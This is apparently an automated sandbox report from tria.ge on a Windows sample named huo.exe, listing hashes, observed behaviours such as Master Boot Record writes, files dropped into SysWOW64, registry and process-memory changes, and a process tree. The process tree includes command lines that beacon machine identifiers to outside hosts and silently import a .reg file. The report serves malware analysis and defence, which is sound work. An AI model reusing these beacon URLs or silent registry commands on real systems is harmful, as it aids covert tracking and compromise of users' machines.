Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28/02/2024, 08:39
Static task
static1
Behavioral task
behavioral1
Sample
huo.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
huo.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
tj.html
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
tj.html
Resource
win10v2004-20240226-en
General
-
Target
huo.exe
-
Size
85KB
-
MD5
abc1a6cedb451694d573a61be7cb0d33
-
SHA1
a1a1741dcb4a5589ba07bab5931073aeee5275f5
-
SHA256
a35a56366604e755cca7583f94fc0a851b736beb569615d07fb2ff0c81e48986
-
SHA512
41d3d98baeaf4931388b9231a79fbc5f284755a9c75d5d91ad2716b3e78e501dc9668d7fe0e9cfc6fcac5d45f869b2f9e75779e748e8719d21aeaadb95bc3133
-
SSDEEP
1536:xF4mvWAvxyR5UNATpYRGST7/aN0o88FwbWcK4bqTpAj09m:omTxyRPpY4ST7/aNf8PbWcK4buW04
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2908 hrdsoft.exe -
Loads dropped DLL 2 IoCs
pid Process 1924 huo.exe 1924 huo.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 huo.exe File opened for modification \??\PhysicalDrive0 hrdsoft.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\ba1023.ico huo.exe File opened for modification C:\Windows\SysWOW64\4.ico huo.exe File opened for modification C:\Windows\SysWOW64\7.ico huo.exe File opened for modification C:\Windows\SysWOW64\10.ico huo.exe File opened for modification C:\Windows\SysWOW64\2.ico huo.exe File opened for modification C:\Windows\SysWOW64\12.ico huo.exe File opened for modification C:\Windows\SysWOW64\ib4856.ico huo.exe File opened for modification C:\Windows\SysWOW64\hrdsoft.exe hrdsoft.exe File opened for modification C:\Windows\SysWOW64\3.ico huo.exe File opened for modification C:\Windows\SysWOW64\8.ico huo.exe File opened for modification C:\Windows\SysWOW64\11.ico huo.exe File opened for modification C:\Windows\SysWOW64\5.ico huo.exe File opened for modification C:\Windows\SysWOW64\6.ico huo.exe File opened for modification C:\Windows\SysWOW64\9.ico huo.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F0D07F71-D614-11EE-B6BE-66DD11CD6629} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EB9B7D71-D614-11EE-B6BE-66DD11CD6629} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application\ = "Folders" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\BrowserFlags = "16" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command\ = "%SystemRoot%\\Explorer.exe /idlist,%I,%L" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic\ = "AppProperties" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ExplorerFlags = "18" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ = "[ViewFolder(\"%l\", %I, %S)]" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec\ = "[]" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\NoActivateHandler regedit.exe -
Runs .reg file with regedit 1 IoCs
pid Process 2788 regedit.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1924 huo.exe 2908 hrdsoft.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2548 iexplore.exe 2748 iexplore.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1924 huo.exe 2548 iexplore.exe 2548 iexplore.exe 1316 IEXPLORE.EXE 1316 IEXPLORE.EXE 2908 hrdsoft.exe 2748 iexplore.exe 2748 iexplore.exe 1048 IEXPLORE.EXE 1048 IEXPLORE.EXE 1048 IEXPLORE.EXE 1048 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1924 wrote to memory of 2548 1924 huo.exe 28 PID 1924 wrote to memory of 2548 1924 huo.exe 28 PID 1924 wrote to memory of 2548 1924 huo.exe 28 PID 1924 wrote to memory of 2548 1924 huo.exe 28 PID 2548 wrote to memory of 1316 2548 iexplore.exe 29 PID 2548 wrote to memory of 1316 2548 iexplore.exe 29 PID 2548 wrote to memory of 1316 2548 iexplore.exe 29 PID 2548 wrote to memory of 1316 2548 iexplore.exe 29 PID 1924 wrote to memory of 2908 1924 huo.exe 31 PID 1924 wrote to memory of 2908 1924 huo.exe 31 PID 1924 wrote to memory of 2908 1924 huo.exe 31 PID 1924 wrote to memory of 2908 1924 huo.exe 31 PID 2908 wrote to memory of 2520 2908 hrdsoft.exe 32 PID 2908 wrote to memory of 2520 2908 hrdsoft.exe 32 PID 2908 wrote to memory of 2520 2908 hrdsoft.exe 32 PID 2908 wrote to memory of 2520 2908 hrdsoft.exe 32 PID 2908 wrote to memory of 2748 2908 hrdsoft.exe 34 PID 2908 wrote to memory of 2748 2908 hrdsoft.exe 34 PID 2908 wrote to memory of 2748 2908 hrdsoft.exe 34 PID 2908 wrote to memory of 2748 2908 hrdsoft.exe 34 PID 2520 wrote to memory of 2788 2520 cmd.exe 35 PID 2520 wrote to memory of 2788 2520 cmd.exe 35 PID 2520 wrote to memory of 2788 2520 cmd.exe 35 PID 2520 wrote to memory of 2788 2520 cmd.exe 35 PID 2748 wrote to memory of 1048 2748 iexplore.exe 36 PID 2748 wrote to memory of 1048 2748 iexplore.exe 36 PID 2748 wrote to memory of 1048 2748 iexplore.exe 36 PID 2748 wrote to memory of 1048 2748 iexplore.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\huo.exe"C:\Users\Admin\AppData\Local\Temp\huo.exe"1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.the9q.com/tong/get.asp?mac=66DD11CD6629&makedate=QM00013&comput=Home&ver=27&userid=00082⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2548 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1316
-
-
-
C:\Windows\SysWOW64\hrdsoft.exeC:\Windows\system32\hrdsoft.exe C:\Users\Admin\AppData\Local\Temp\huo.exe===2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"3⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"4⤵
- Modifies registry class
- Runs .reg file with regedit
PID:2788
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.38078.comget.asp?mac=66DD11CD6629&makedate=QM00013&comput=Home&ver=30&userid=03⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2748 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1048
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5acad335258ad98940d9d4274eb2c6679
SHA1b99ca9e4519fa077363d80eeeea36442730c0b55
SHA2561c08cb7574e31216e3846448896406596cbef077917f041737cedc03c46a199e
SHA512af0bce4a3347f1a3e3a6dad59a5bfb7d5e9d52cd3feb90a214fd54b29613eaf1ca6e5758b04932764c2123bd8a7b8d093b410235e637992fc7be2efe4760b3bf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD58cb7dbba97e6c89b367a3b3a5b0e0a6e
SHA1372fc14d9c5d6861d9268df93850a6642332a017
SHA2569e0b545099bb13d14ccde11a900dc1991f1b986e2e4ccc85757004b5c1032c80
SHA51281b045e23baaf8f878588e4245b596f3bad38d3c9b437c5eeb8aadd865fdecdcb6e72b46995e19eb08a6ef3a021e5dd4e823d4316dc8e566832139de9cd8932c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD54245e6531bde297afbe67a25d1eedc7e
SHA1b64ef6716b191d57c6f089050af7a6798d8a41a7
SHA2566c74c227a8588c7befad172238bf9c225f32213df89cb2e359e1b5a7d7779453
SHA5128e69f347b6ee73f4fdcff9413ab77bb560cf7af7f566fd541cd261c749c92708390db9360b958f2e5bc0fe91da96575f94ba43f6725c6e8ff696b15bd5f14df1
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EB9B7D71-D614-11EE-B6BE-66DD11CD6629}.dat
Filesize5KB
MD5d20d5e11f6b415f0529249b9bc1516cd
SHA184656c2ff5852c59494d2150f93ec433b0241075
SHA25636a8a69be601217c728b07464451764d7ac7240e3960ddec08defdd730fd7c3a
SHA5121ac5787b72b86cc9594d55aa13cf1ba91c8900ad1dc7cfebf91a8d3f1eb880a6b602fd7451450e777dc5db731727f89932834ccd4978c37bb9086ee9d08a24e2
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
Filesize
1KB
MD5626e2d76f5c328d57a3eff6a7f94d129
SHA1210fd33fa005775b30a8fd40a065a2e788934216
SHA2565d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e
SHA512629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1
-
Filesize
16KB
MD51132d58cf550d49b6d2dbb59c07fedb5
SHA14068621fdfa719ae3b8070240f5dfd490f09505d
SHA25617a99a46f69ddcf677a0241007c1c35e53e24216a0c515662de2f0522f41f105
SHA5121d7691c28aa0f3ae8b5f3bf47245b936c810c79baf5407e0af2e9b70cb095549baeeb35265735f7db7906ec96e4843a69e9e79a81270d990841d7be8258de91c